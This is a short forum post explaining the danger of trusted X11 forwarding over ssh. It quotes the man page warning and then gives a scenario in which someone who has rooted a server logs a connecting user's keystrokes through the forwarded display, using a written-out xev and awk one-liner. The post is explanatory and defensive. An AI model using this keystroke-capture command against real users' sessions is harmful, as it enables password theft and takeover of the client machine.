I thought it was the opposite:
Quote:
-X Enables X11 forwarding. This can also be specified on a per-host basis in a configuration file.
X11 forwarding should be enabled with caution. Users with the ability to bypass file permissions on the
remote host (for the user's X authorization database) can access the local X11 display through the for‐
warded connection. An attacker may then be able to perform activities such as keystroke monitoring.
|
I'm not sure how to enable untrusted but the problem with trusted is this:
Alice sitting on Client connects to Server.
Unfortunatly.. Bob has rooted Server. He has full access to files (like ~alice/.Xauthority)
Alice opens an xterm on Client.
Bob sets his display to the same that was given by Alice and through the tunnel, attaches to her display on Client: DISPLAY=localhost:10.0 xev -id <xterm_window_id> | awk '/XLookupString gives 1 bytes/{ print $6}' | uniq
Alice on the client:
su -
s3cr3t
Bob on the server:
"s"
"3"
"c"
"r"
"3"
"t"
Bob now has root password of client... EOG
With sudo, Alice wouldn't have typed her password
Unfortunatly, Bob can also trivially inject commands in the xterm.